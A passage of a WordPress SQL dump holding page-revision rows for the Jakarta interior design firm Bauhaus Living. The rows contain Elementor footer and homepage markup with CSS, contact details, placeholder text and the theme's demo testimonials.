		021 22544768												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-4731\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-4732\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4733\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\" target=\"_blank\" rel=\"noopener\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n		© All Copyright 2022 by Ovatheme.com','Footer','','inherit','closed','closed','','103-revision-v1','','','2023-09-22 09:10:32','2023-09-22 09:10:32','',103,'https://bauhaus.futuremediatrix.com/?p=4888',0,'revision','',0),(4889,3,'2023-09-22 09:12:51','2023-09-22 09:12:51','<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Le\'t turn your ideas into reality</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-4731\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-4732\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4733\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\" target=\"_blank\" rel=\"noopener\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n		<p>© 2023 bauhaus living, develop by <a href=\"http://www.futuremediatrix.com\">futuremediatrix.com</a></p>','Footer','','inherit','closed','closed','','103-revision-v1','','','2023-09-22 09:12:51','2023-09-22 09:12:51','',103,'https://bauhaus.futuremediatrix.com/?p=4889',0,'revision','',0),(4891,3,'2023-09-22 09:15:52','2023-09-22 09:15:52','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:15:52','2023-09-22 09:15:52','',22,'https://bauhaus.futuremediatrix.com/?p=4891',0,'revision','',0),(4892,3,'2023-09-22 09:15:52','2023-09-22 09:15:52','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				